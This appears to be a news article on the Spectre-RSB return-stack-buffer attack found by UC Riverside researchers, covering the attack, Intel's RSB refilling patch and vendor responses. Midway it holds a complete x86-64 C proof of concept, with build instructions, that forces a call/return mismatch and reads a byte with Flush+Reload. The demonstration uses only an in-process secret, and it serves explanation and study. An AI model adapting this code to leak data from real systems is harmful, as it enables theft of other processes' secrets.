Another side-channel vulnerability has been identified that could be exploited in a Spectre-class attack, and it is not blocked by the patches that address the original Spectre flaws. The vulnerability was identified by researchers at the University of California, Riverside (UCR), who recently published details of the attack method, which they term Spectre-RSB.
The attack abuses the speculative execution feature of modern CPUs, which improves performance by executing instructions ahead of time, before the processor knows for certain that they are needed, and discarding the results if they turn out not to be.
In contrast to previous Spectre attacks, this method targets the return stack buffer (RSB) rather than the branch target buffer used by Spectre v2. The RSB predicts the return address of each return instruction; because almost every function returns to the instruction after the call that invoked it, the prediction is highly accurate. When the return address on the stack no longer matches the RSB's prediction, whether because an attacker has executed a call without a matching return, overwritten the saved return address, or left stale entries in the buffer across a context switch, the CPU speculatively executes code at the predicted address until the mismatch is detected. The researchers have shown that it is possible to conduct attacks that “exploit the Return Stack Buffer (RSB) to cause speculative execution of the payload gadget that reads and exposes sensitive information.”
The researchers demonstrated that it is possible to pollute the RSB and read data belonging to another process running on the same physical core and, in a further attack, to cause a misspeculation inside an SGX enclave that leaked data from within the enclave to code outside it.
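As an added example (written for this page, not the UCR team's proof-of-concept code), the x86-64 C program below shows the primitive the attack is built on: a call pushes a return address onto both the stack and the RSB, the callee overwrites the saved return address, and the ret that follows returns architecturally to the rewritten target while the RSB steers speculative execution into the gadget after the call. A Flush+Reload probe then recovers the byte the squashed gadget touched. It assumes GCC or Clang on x86-64 Linux, a constructed one-byte secret in the same process, and a cache-hit threshold (CACHE_HIT_THRESHOLD, an assumed value) that must be measured on the target machine; on noisy or hardened systems leak_byte may report no hit, while the architectural check (rsb_misdirect returning 0) is deterministic.

```c
/* Added illustration of the SpectreRSB call/return mismatch on x86-64 (GCC/Clang
 * inline asm); not the researchers' code. Assumptions, constructed for this
 * example: Linux user space, the secret lives in this same process, and
 * CACHE_HIT_THRESHOLD is tuned for the machine it runs on. */
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

#define PROBE_STRIDE 4096            /* one page per possible byte value */
#define CACHE_HIT_THRESHOLD 100      /* assumed; measure on the target machine */

static uint8_t probe[256 * PROBE_STRIDE];
static const uint8_t secret[] = "S"; /* constructed secret read by the gadget */

/*
 * "call 1f" pushes the address of the gadget (the instruction after the call)
 * onto both the architectural stack and the RSB. The callee rewrites the saved
 * return address to label 2 and executes ret. Architecturally control lands on
 * label 2, so this function returns 0; the RSB still predicts a return to the
 * gadget, which therefore runs speculatively and pulls one probe page, indexed
 * by the secret byte, into the cache before the CPU squashes it.
 */
int rsb_misdirect(const uint8_t *p)
{
    int gadget_ran_architecturally = 0;
    __asm__ volatile (
        "subq  $128, %%rsp\n\t"              /* step over the red zone */
        "call  1f\n\t"
        /* --- speculative gadget: reached only via the RSB prediction --- */
        "movzbl (%[p]), %%eax\n\t"           /* read the secret byte */
        "shll  $12, %%eax\n\t"               /* scale it to a probe page */
        "movb  (%[probe],%%rax,1), %%al\n\t" /* touch that page */
        "movl  $1, %[flag]\n\t"              /* only visible if not squashed */
        "jmp   2f\n\t"
        "1:\n\t"                             /* callee: redirect the real return */
        "leaq  2f(%%rip), %%rax\n\t"
        "movq  %%rax, (%%rsp)\n\t"           /* overwrite the saved return address */
        "ret\n\t"                            /* RSB says gadget, stack says label 2 */
        "2:\n\t"
        "addq  $128, %%rsp\n\t"
        : [flag] "+r" (gadget_ran_architecturally)
        : [p] "r" (p), [probe] "r" (probe)
        : "rax", "memory", "cc");
    return gadget_ran_architecturally;
}

/* Timed load used by the Flush+Reload probe. */
static uint64_t time_read(const uint8_t *addr)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*(volatile const uint8_t *)addr;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Flush the probe array, trigger the misdirection, then look for the page that
 * keeps coming back cached. Returns the byte value with the most hits, or -1 if
 * nothing was observed (noisy timing, wrong threshold, or a mitigated CPU). */
int leak_byte(const uint8_t *p, int rounds)
{
    int hits[256] = {0};
    for (int r = 0; r < rounds; r++) {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * PROBE_STRIDE]);
        _mm_mfence();
        rsb_misdirect(p);
        for (int i = 0; i < 256; i++) {
            int v = (i * 167 + 13) & 255;    /* scrambled order defeats the prefetcher */
            if (time_read(&probe[v * PROBE_STRIDE]) < CACHE_HIT_THRESHOLD)
                hits[v]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (hits[i] > hits[best]) best = i;
    return hits[best] ? best : -1;
}

int main(void)
{
    int arch = rsb_misdirect(secret);
    int leaked = leak_byte(secret, 1000);
    printf("architectural path reached the gadget: %d (expect 0)\n", arch);
    if (leaked < 0)
        printf("no leak observed; tune CACHE_HIT_THRESHOLD for this machine\n");
    else
        printf("leaked byte: 0x%02x ('%c'), expect 'S'\n", leaked, leaked);
    return 0;
}
```

Build with `cc -O2 -o spectre_rsb spectre_rsb.c` and run it a few times; the architectural check always reports 0, and on an unmitigated Intel or AMD core the leaked byte should converge on 'S'. The cross-process and SGX variants described above arrange the same stack-versus-RSB mismatch differently: instead of rewriting its own return address, the attacker leaves extra or stale entries in the RSB from another context and lets a victim's return instruction consume them.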
While retpoline and Intel's microcode patches prevent the original Spectre flaws from being exploited, the researchers say these patches do not address the RSB flaw. Intel has released a patch called RSB refilling (also known as RSB stuffing) for some of its CPUs, which fills the RSB with benign entries on a switch into the kernel and so disrupts Spectre-RSB attacks that cross that boundary. The patch was released to address a separate problem: on Skylake and newer processors an empty RSB causes the CPU to fall back to the branch target buffer, reopening the Spectre v2 attack that retpoline was meant to close. It was therefore only rolled out to Core i7 Skylake and newer processors, not to Intel's Xeon line. The researchers recommended that the patch be applied on all machines to protect against Spectre-RSB attacks.
Intel responded to a request from Bleeping Computer about the flaws and said that the Spectre-RSB attack method is related to the Branch Target Injection vulnerability (CVE-2017-5715) and that existing mitigations can prevent these Spectre-RSB attacks.
The UCR researchers note that, while they have not tested the attack method on AMD and ARM processors, both also use an RSB to predict return addresses and are likely to be susceptible to this attack method as well.